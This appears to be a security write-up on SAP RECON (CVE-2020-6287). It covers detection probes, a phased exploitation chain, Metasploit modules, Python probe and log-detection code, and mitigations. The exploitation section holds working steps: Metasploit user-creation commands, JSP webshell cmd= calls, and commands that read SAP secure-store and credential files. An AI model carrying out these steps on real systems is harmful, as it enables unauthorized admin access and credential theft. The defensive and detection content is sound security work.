SAP RECON — CVE-2020-6287
CVE-2020-6287, dubbed RECON (Remotely Exploitable Code On NetWeaver), is a CVSS 10.0 missing-authentication flaw in the LM Configuration Wizard of SAP NetWeaver Application Server Java. Disclosed by Onapsis and patched by SAP in July 2020. An unauthenticated attacker who can reach the Java HTTP port can create an administrator-level user and from there obtain OS command execution, which is why it is treated as pre-auth RCE. Onapsis estimated 40,000+ SAP customers potentially affected.
Vulnerability Summary
| Field | Detail |
|---|---|
| CVE | CVE-2020-6287 (related: CVE-2020-6286) |
| CVSS Score | 10.0 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Affected Component | SAP NetWeaver AS Java — LM Configuration Wizard |
| Affected Versions | NetWeaver AS Java 7.30, 7.31, 7.40, 7.50 |
| Auth Required | None |
| Network Access | HTTP/HTTPS on the AS Java port (5NN00, or 5NN01 for HTTPS, where NN is the instance number); not internet-facing by design, but frequently exposed: Onapsis counted at least 2,500 affected systems reachable from the internet |
| Patch | SAP Security Note #2934135 (July 2020) |
| Discovered By | Onapsis Research Labs |
How It Works
The LM Configuration Wizard (application tc~lm~ctc~cul~startup_app) ships with a SOAP web service, CTCWebService, that runs administrative configuration procedures such as user management. The service did not check whether the caller was authenticated before executing them (CWE-306, missing authentication for a critical function). The wizard is meant for initial system setup, but it is deployed and running by default on every AS Java instance, so the unauthenticated entry point is present in production systems.
An attacker can:
- Call the unauthenticated CTCWebService SOAP endpoint
- Create a new user and place it in the Administrators group
- Log in with that user to the Java administration interfaces (NetWeaver Administrator, portal, deployment tools)
- Deploy arbitrary content (JSP webshells, payloads) through the Java application server's deployment mechanism
- Execute OS commands as <sid>adm, the account the Java server process runs as
Additionally, CVE-2020-6286 (path traversal, CVSS 5.3) in the same component lets an unauthenticated attacker make the server download a ZIP file into a chosen directory. It is sometimes chained with CVE-2020-6287 to place files before code execution.
The endpoint targeted is the CTCWebService bean on the Java HTTP port:
/CTCWebService/CTCWebServiceBean
(its WSDL is served at /CTCWebService/CTCWebServiceBean?wsdl)
Detection — Is the Target Vulnerable?
Step 1: Check If the LM Config Wizard Service Is Reachable Without Credentials
# Port 50000 assumes instance number 00; use 5NN00 for instance NN (5NN01 for HTTPS)
# Fetch the CTCWebService WSDL with no credentials
curl -s -o /dev/null -w "%{http_code}\n" \
  "http://<target>:50000/CTCWebService/CTCWebServiceBean?wsdl"
# 200 with a WSDL body = service answers anonymous callers (candidate for RECON)
# 401/403 = an authentication check is in place (consistent with the patch)
# 404/503 = application not deployed or stopped (consistent with the workaround)
# The wizard UI is served through Web Dynpro; a non-404 here also shows the app is active
curl -s -o /dev/null -w "%{http_code}\n" \
  http://<target>:50000/webdynpro/resources/sap.com/tc~lm~ctc~cul~startup_app/
curl -s -o /dev/null -w "%{http_code}\n" \
  http://<target>:50000/webdynpro/dispatcher/sap.com/tc~lm~ctc~cul~startup_app/LMConfigWizard
# Reachability alone is not proof: the only definitive test is a controlled,
# authorized user-creation attempt (Phase 1 below), followed by cleanup
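An added example, not code from Onapsis, SAP or any tool named on this page: a small Python probe that fetches the paths above without credentials and classifies each response the way the comments do. The status-to-verdict mapping and the `recon-check` User-Agent are our own assumptions; `check_host` takes an injectable `fetch` so the classifier can be exercised offline against constructed responses. The same probe serves as the post-patch verification check (a patched system should answer 401, a stopped application 404).

```python
"""Probe the LM Configuration Wizard endpoints and classify the responses.
Added example for this write-up, not code from Onapsis, SAP or Metasploit.
Assumptions: the paths below (taken from the write-up) and the mapping of
HTTP status to a verdict, which is our own triage heuristic."""
import urllib.error
import urllib.request

# Paths this write-up associates with the wizard (assumed; verify on your release).
RECON_PATHS = (
    "/CTCWebService/CTCWebServiceBean?wsdl",
    "/CTCWebService/CTCWebServiceBean",
    "/webdynpro/dispatcher/sap.com/tc~lm~ctc~cul~startup_app/LMConfigWizard",
)


def http_fetch(url, timeout=10):
    """Real transport: GET url with no credentials, return (status, body_prefix).
    HTTP errors keep their status code; network failures return (None, '')."""
    req = urllib.request.Request(url, headers={"User-Agent": "recon-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read(4096).decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None, ""


def classify(status, body):
    """Map one unauthenticated response to a verdict (heuristic, assumed)."""
    if status is None:
        return "unreachable"
    if status == 404:
        return "absent"            # app not deployed or stopped (workaround state)
    if status in (401, 403):
        return "auth-enforced"     # consistent with the patched behaviour
    text = body.lower()
    if status == 200 and ("definitions" in text or "ctcwebservice" in text):
        return "exposed-unauth"    # WSDL / service page served to an anonymous caller
    if status == 200:
        return "reachable"         # something answered; inspect manually
    return "other"


def check_host(base_url, fetch=http_fetch):
    """Return {path: verdict} for every RECON-related path on one host."""
    base = base_url.rstrip("/")
    return {path: classify(*fetch(base + path)) for path in RECON_PATHS}


def needs_attention(results):
    """True when any path answered an anonymous request with content.
    Triage signal only: a controlled user-creation attempt is what proves
    CVE-2020-6287 itself."""
    return any(v in ("exposed-unauth", "reachable") for v in results.values())


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:50000"
    verdicts = check_host(target)
    for path, verdict in verdicts.items():
        print(f"{verdict:15} {path}")
    print("needs attention" if needs_attention(verdicts) else "no anonymous exposure seen")
```

Run it as `python3 recon_probe.py http://<target>:50000`; a mix of `auth-enforced` and `absent` is what a patched or hardened instance should produce.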
Step 2: Confirm Version
# Check the SAP release via the server header (present on most responses)
curl -sI http://<target>:50000/irj/portal | grep -i '^server:'
# e.g. server: SAP NetWeaver Application Server 7.50 / AS Java 7.50
# Or via Nmap service detection
nmap -sV -p 50000 <target>
# A release of 7.30/7.31/7.40/7.50 is necessary but not sufficient: the header
# does not reveal the support package level, so it cannot tell patched from unpatched
Step 3: Metasploit Module
Metasploit has no scanner-only module for RECON; the admin module below confirms the vulnerability by actually creating a user through CTCWebService, so run it only on systems you are authorized to test and clean up afterwards (the matching delete module is listed under Metasploit Modules).
msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > show options   # set the username/password options for the account to create
msf > run
# A successful run means the endpoint accepted an unauthenticated user-creation request
Exploitation Chain
Phase 1: Create Admin User via Unauthenticated SOAP Call
The CTCWebService accepts SOAP requests that execute configuration wizard procedures. The public exploit invokes the service's synchronous execution operation with the wizard's user-management procedure and supplies the new user's name, password and the Administrators group as procedure input; the service runs it without checking who the caller is.
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: <target>:50000
Content-Type: text/xml; charset=utf-8
[SOAP envelope invoking the user-management procedure with the new admin user's details; body omitted here]
Tools that automate this:
- Metasploit module auxiliary/admin/sap/cve_2020_6287_ws_add_user (and cve_2020_6287_ws_delete_user for cleanup)
- PoC scripts published on GitHub by Dmitry Chastuhin and others shortly after the patch
- redrays.io automated scanner
Phase 2: Log In as Created Admin User
# Use the newly created user to authenticate to the Java stack
# Enterprise Portal (if deployed); /irj/portal normally accepts Basic auth
curl -u <new_admin>:<pass> http://<target>:50000/irj/portal
# SAP NetWeaver Administrator runs on the same Java HTTP port, not on 50013
# (5NN13/5NN14 belong to sapstartsrv, the SAP Start Service)
curl -u <new_admin>:<pass> http://<target>:50000/nwa
Phase 3: Deploy a JSP Webshell
Once authenticated as an admin user, deploy a JSP page to the SAP application server:
Target path: ../apps/sap.com/irj/servlet_jsp/irj/root/<random>.jsp
Access URL: http://<target>:50000/irj/<random>.jsp?cmd=<os_command>
The file upload uses the Java application deployment mechanism. After deployment:
# Execute OS commands via the webshell
curl "http://<target>:50000/irj/<shell>.jsp?cmd=id"
curl "http://<target>:50000/irj/<shell>.jsp?cmd=whoami"
# The Java server process runs as <SID>adm, the SAP OS service account, so the
# commands above execute with its privileges
Phase 4: Lateral Movement
The <SID>adm account has:
- OS-level ownership of the SAP instance: it can stop and start all SAP services
- Read access to the Java secure store, which holds the database credentials the AS Java schema connects with
- Access to profiles, configuration files, the transport directory and, on an ABAP stack, the ABAP secure storage (rsecssfs)
# Database credentials used by the Java stack sit in the Java secure store (readable by <SID>adm)
ls -l /usr/sap/<SID>/SYS/global/security/data/SecStore.properties \
      /usr/sap/<SID>/SYS/global/security/data/SecStore.key
# HANA: <SID>adm typically holds hdbuserstore keys; list them, then query with a stored key
hdbuserstore LIST
hdbsql -U <key> "SELECT USER_NAME, USER_DEACTIVATED FROM SYS.USERS"
# USR02 (ABAP user/password hash table) exists only on an ABAP system, not in an AS Java schema
# On an ABAP stack the secure storage lives here (encrypted with the key under rsecssfs/key)
cat /usr/sap/<SID>/SYS/global/security/rsecssfs/data/SSFS_<SID>.DAT
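What the chain above leaves behind in HTTP access logs, as an added example that is not part of the original page and not Onapsis or SAP code: a Python detector that flags the two observable stages, an anonymous call to the CTCWebService path (Phase 1) and a `.jsp` under `/irj/` invoked with a `cmd=` parameter (Phase 3). The sample lines are constructed in Apache combined format for illustration; real AS Java HTTP access logs are configured per system, so the regex is an assumption to adapt. The trusted-network allowlist used for severity is also ours.

```python
"""Flag RECON-style activity in HTTP access log lines.
Added example for this write-up (not Onapsis/SAP/Metasploit code).
Assumptions: Apache combined log format, the two path patterns from the
write-up, and an allowlist of admin networks used only to grade severity."""
import ipaddress
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: an external host fetches the WSDL, calls the service,
# then uses the resulting account and a webshell; an admin works from inside.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jul/2020:10:01:02 +0000] "GET /CTCWebService/CTCWebServiceBean?wsdl HTTP/1.1" 200 5120 "-" "python-requests/2.24.0"
203.0.113.7 - - [14/Jul/2020:10:01:05 +0000] "POST /CTCWebService/CTCWebServiceBean HTTP/1.1" 200 312 "-" "python-requests/2.24.0"
203.0.113.7 - z_recon [14/Jul/2020:10:02:11 +0000] "GET /irj/portal HTTP/1.1" 200 18342 "-" "Mozilla/5.0"
203.0.113.7 - z_recon [14/Jul/2020:10:05:40 +0000] "GET /irj/x7g2.jsp?cmd=id HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.1.2.3 - j2ee_admin [14/Jul/2020:10:06:00 +0000] "GET /nwa/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.1.2.3 - - [14/Jul/2020:10:07:30 +0000] "POST /CTCWebService/CTCWebServiceBean HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(lines, admin_nets=("10.0.0.0/8",)):
    """Return findings as (rule, severity, client_ip, method, target) tuples."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        try:
            ip = ipaddress.ip_address(rec["ip"])
            trusted = any(ip in n for n in nets)
        except ValueError:          # hostname instead of an address: treat as untrusted
            trusted = False
        if path.startswith("/CTCWebService/"):
            # Any reach of the wizard service is notable; an untrusted POST that
            # got 200 is the shape of the actual user-creation request.
            external_post = rec["method"] == "POST" and not trusted and rec["status"] == "200"
            severity = "high" if external_post else "medium"
            findings.append(("ctc-wizard-call", severity, rec["ip"], rec["method"], rec["target"]))
        elif path.startswith("/irj/") and path.endswith(".jsp") and re.search(r"(^|&)cmd=", query):
            findings.append(("jsp-webshell", "high", rec["ip"], rec["method"], rec["target"]))
    return findings


def summarize(findings):
    """Count findings per rule, handy for a one-line dashboard figure."""
    counts = {}
    for rule, *_ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG.splitlines())
    for hit in hits:
        print(*hit)
    print(summarize(hits))
```

Feed real logs with `detect(open(path).readlines())`; the medium-severity hits on `/CTCWebService/` are worth keeping even after patching, since they show who was probing the endpoint while it was exposed.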
Metasploit Modules
# Confirm and exploit: create an Administrators-group user through the unauthenticated CTCWebService
msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > show options   # username/password options for the account to create
msf > run
# Clean up: remove the user again through the same unauthenticated path
msf > use auxiliary/admin/sap/cve_2020_6287_ws_delete_user
msf > set RHOSTS <target>
msf > set RPORT 50000
msf > run
# No single Metasploit module turns RECON into a Meterpreter session; Phases 2 and 3
# (login, JSP deployment) are carried out with the created credentials
Mitigation
Primary fix: Apply SAP Security Note #2934135, which adds the missing authentication check to the LM Configuration Wizard.
Temporary workaround (if patching is not immediately possible), described in SAP Security Note #2939665:
- Disable the LM Configuration Wizard application: in SAP NetWeaver Administrator → Operations → Systems → Start & Stop → Java Applications, select tc~lm~ctc~cul~startup_app and stop it; the wizard is only needed during initial setup
- Block external access to the Java HTTP/HTTPS ports (5NN00/5NN01) at the network level; administrative interfaces should not be reachable from the internet
- Add a WAF or reverse-proxy rule that denies requests to /CTCWebService/ and to the tc~lm~ctc~cul~startup_app Web Dynpro paths from untrusted networks
- Before and after patching, audit the UME for unexpected accounts in the Administrators group: a successful attack leaves the created user behind, and the patch does not remove it
Verification after patch:
# Should return 401 (patched, authentication enforced) or 404 (application stopped)
curl -s -o /dev/null -w "%{http_code}\n" "http://<target>:50000/CTCWebService/CTCWebServiceBean?wsdl"
Related CVEs
| CVE | Description | CVSS |
|---|---|---|
| CVE-2020-6286 | SAP NetWeaver Java path traversal (unauthenticated ZIP download) | 5.3 |
| CVE-2020-6207 | SAP Solution Manager EEM missing authentication — unauthenticated RCE | 10.0 |
| CVE-2022-22536 | SAP ICM HTTP request smuggling — session theft, ABAP+Java | 10.0 |
References
- Onapsis Advisory: ONAPSIS-2021-0003
- CISA Advisory: AA20-195A
- SAP Security Note: #2934135
- CISA KEV: CVE-2020-6287 is listed in the Known Exploited Vulnerabilities catalog
- Active exploitation was confirmed by Onapsis and CISA after the public PoC appeared (July 2020) and again in their 2021 reporting on attacks against SAP applications